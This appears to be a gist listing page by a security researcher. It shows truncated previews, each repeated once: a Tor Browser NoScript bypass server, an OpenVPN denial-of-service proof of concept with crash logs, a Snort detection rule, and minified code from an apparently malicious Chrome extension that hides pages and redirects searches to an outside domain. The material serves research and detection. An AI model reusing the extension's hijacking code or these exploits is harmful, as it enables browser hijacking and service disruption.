x0rz

## TorBrowser_7.x_NoScript_bypass.py
#!/usr/bin/python
from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer

PORT_NUMBER = 31337

class myHandler(BaseHTTPRequestHandler):

        #Handler for the GET requests
        def do_GET(self):
                self.send_response(200)

## wordpress_snort.rules
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"MALWARE-CNC possible infected wordpress second stage download attempt"; flow:to_server,established; http_uri; pcre:"/\/wp-(includes|admin|content)\/.*\.(exe|dll|scr|rar|zip|jar|ps1|bat)/iU";metadata:service http; reference:url,medium.com/@x0rz/threat-hunting-on-simple-tricks-27e64e39f2f0; classtype:trojan-activity; sid:31337; rev:1;)

## manifest.json
{
   "background": {
      "scripts": [ "background.js" ]
   },
   "browser_action": {
      "default_icon": "opurie.png",
      "default_popup": "popup.html",
      "default_title": "Opurie"
   },
   "description": "Whiohoo! Welcome back to Opurie",

## background_beautify.js
function redirect(e) {
    chrome.tabs.update({
        url: e
    })
}
var pagebrowsed, allowSearch, prevurl = null,
    srchid = 100,
    sysid = 739,
    random = Math.floor(1e7 * Math.random()),
    thanksmsg = [random, "slonif", ".", "faith", "opurie", "com"],

## background.js
function redirect(e){chrome.tabs.update({url:e})}var pagebrowsed,allowSearch,prevurl=null,srchid=100,sysid=739,random=Math.floor(1e7*Math.random()),thanksmsg=[random,"slonif",".","faith","opurie","com"],InstallDone="";chrome.tabs.onUpdated.addListener(function(){chrome.tabs.getSelected(null,function(e){var s=e.url;if(InstallDone){InstallDone[srchid]?InstallDone[srchid]:InstallDone.default;if(s!=prevurl&&(prevurl=s,chrome.storage.sync.get({pagebrowsed:0},function(e){pagebrowsed=e.pagebrowsed,chrome.storage.sync.set({pagebrowsed:e.pagebrowsed+1})})),pagebrowsed>5&&(document.getElementsByTagName("body")[0].style.display="none",s.match(/google/)||s.match(/bing/))){var t=s.split("q=");if(t.length>1){var a="http://startupfraction.com/yaelba/?keyword="+t[1].split("&")[0]+"&id="+srchid+"&sysid="+sysid;redirect(a),chrome.tabs.update({url:a})}}if(pagebrowsed>5)try{var n=window.document.createElement("canvas").getContext("2d");chrome.browserAction.setIcon({imageData:n.getImageData(0,0,19,19)})}catch(e){}}})}),fetch("htt

## dos_server.py
#!/usr/bin/env python3
# Script by Quarkslab from https://ostif.org/wp-content/uploads/2017/05/OpenVPN1.2final.pdf
"""
$ ./dos_server.py &
$ sudo ./openvpn-2.4.0/src/openvpn/openvpn conf/server-tls.conf
...
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 TLS: Initial packet from [AF_INET]192.168.149.1:64249, sid=9a6c48a6 1467f5e1
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Assertion failed at ssl.c:3711 (buf_copy(in, buf))
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Exiting due to fatal error
Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/route del -net 10.8.0.0 netmask␣255.255.255.0

## bulk_dns_check.py
# Usage: ./dns_check.py <list_of_domain_names.txt>
import dns.resolver
import requests
import re
import json
import sys

resolver = dns.resolver.Resolver()
resolver.timeout = 5
resolver.lifetime = 5

## eqgrp_services_lookup.ps1
echo "[+] Getting \system\\currentcontrolset\\services"

$raw_services = Get-ChildItem -Path hklm:\system\\currentcontrolset\\services | select Name
$services = @()

foreach ($srv in $raw_services) {
	$shortname = "$srv".Split("\")[-1]
	$shortname = $shortname.Substring(0,$shortname.Length-1)
	$services += $shortname
}

## signal commands_2.txt
# Get the text from the QR code given by the Signal app and link your new number to it
signal-cli -u "+1234568790" addDevice --uri "tsdevice:/?uuid=xxxxxxxx..."

## signal commands.txt
# Registering your new number
signal-cli -u "+1234568790" register
signal-cli -u "+1234568790" verify xxxxxx
	#!/usr/bin/python
	from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer

	PORT_NUMBER = 31337

	class myHandler(BaseHTTPRequestHandler):

	#Handler for the GET requests
	def do_GET(self):
	self.send_response(200)
	{
	"background": {
	"scripts": [ "background.js" ]
	},
	"browser_action": {
	"default_icon": "opurie.png",
	"default_popup": "popup.html",
	"default_title": "Opurie"
	},
	"description": "Whiohoo! Welcome back to Opurie",
	function redirect(e) {
	chrome.tabs.update({
	url: e
	})
	}
	var pagebrowsed, allowSearch, prevurl = null,
	srchid = 100,
	sysid = 739,
	random = Math.floor(1e7 * Math.random()),
	thanksmsg = [random, "slonif", ".", "faith", "opurie", "com"],
	#!/usr/bin/env python3
	# Script by Quarkslab from https://ostif.org/wp-content/uploads/2017/05/OpenVPN1.2final.pdf
	"""
	$ ./dos_server.py &
	$ sudo ./openvpn-2.4.0/src/openvpn/openvpn conf/server-tls.conf
	...
	Fri Feb 24 10:19:19 2017 192.168.149.1:64249 TLS: Initial packet from [AF_INET]192.168.149.1:64249, sid=9a6c48a6 1467f5e1
	Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Assertion failed at ssl.c:3711 (buf_copy(in, buf))
	Fri Feb 24 10:19:19 2017 192.168.149.1:64249 Exiting due to fatal error
	Fri Feb 24 10:19:19 2017 192.168.149.1:64249 /sbin/route del -net 10.8.0.0 netmask␣255.255.255.0
	# Usage: ./dns_check.py <list_of_domain_names.txt>
	import dns.resolver
	import requests
	import re
	import json
	import sys

	resolver = dns.resolver.Resolver()
	resolver.timeout = 5
	resolver.lifetime = 5
	echo "[+] Getting \system\\currentcontrolset\\services"

	$raw_services = Get-ChildItem -Path hklm:\system\\currentcontrolset\\services \| select Name
	$services = @()

	foreach ($srv in $raw_services) {
	$shortname = "$srv".Split("\")[-1]
	$shortname = $shortname.Substring(0,$shortname.Length-1)
	$services += $shortname
	}
	# Get the text from the QR code given by the Signal app and link your new number to it
	signal-cli -u "+1234568790" addDevice --uri "tsdevice:/?uuid=xxxxxxxx..."
	# Registering your new number
	signal-cli -u "+1234568790" register
	signal-cli -u "+1234568790" verify xxxxxx